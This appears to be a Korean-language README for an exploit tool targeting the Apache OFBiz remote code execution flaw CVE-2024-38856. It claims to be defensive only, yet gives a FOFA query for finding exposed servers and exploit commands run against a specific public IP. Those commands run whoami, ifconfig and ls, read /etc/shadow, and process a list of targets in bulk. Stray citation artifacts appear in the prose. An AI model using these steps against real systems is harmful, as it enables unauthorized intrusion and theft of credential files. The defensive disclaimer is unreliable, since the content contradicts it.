
CVE-2024-38856: Apache OFBiz 원격 코드 실행 스캐너 및 익스플로잇
저장소 목적: CVE-2024-38856 (Apache OFBiz 잘못된 권한 부여 / 사전 인증 RCE)에 대한 정보 제공 문서.
이 저장소는 무기화된 익스플로잇 코드를 포함하지 않습니다. 방어 연구, 패치 지침, 탐지 및 안전한 실습 테스트 전용입니다.
CVE-2024-38856은 Apache OFBiz의 잘못된 권한 부여 취약점으로, 인증되지 않은 사용자가 특정 엔드포인트에 접근하고 특정 조건에서 화면 렌더링 코드를 실행하여 원격 코드 실행을 가능하게 할 수 있습니다. 이 문제는 Apache OFBiz 18.12.15에서 수정되었습니다. 18.12.14까지의 이전 릴리스는 영향을 받습니다. :contentReference[oaicite:0]{index=0}
심각도/영향: 여러 보안 업체와 연구자들이 이 취약점을 치명적(critical)으로 평가했습니다. 취약한 인스턴스에서 인증되지 않은 원격 코드 실행으로 이어질 수 있으며, 실제 환경에서 활발한 악용 시도가 관찰되었습니다. 관리자는 노출된 OFBiz 인스턴스를 최우선 해결 항목으로 처리해야 합니다. :contentReference[oaicite:1]{index=1}
fofa : app="Apache_OFBiz" && port="8443"
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.gitcd CVE-2024-38856-Apache-OFBiz└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
─$ python3 apache_bang.py --file target.txt -c "ls"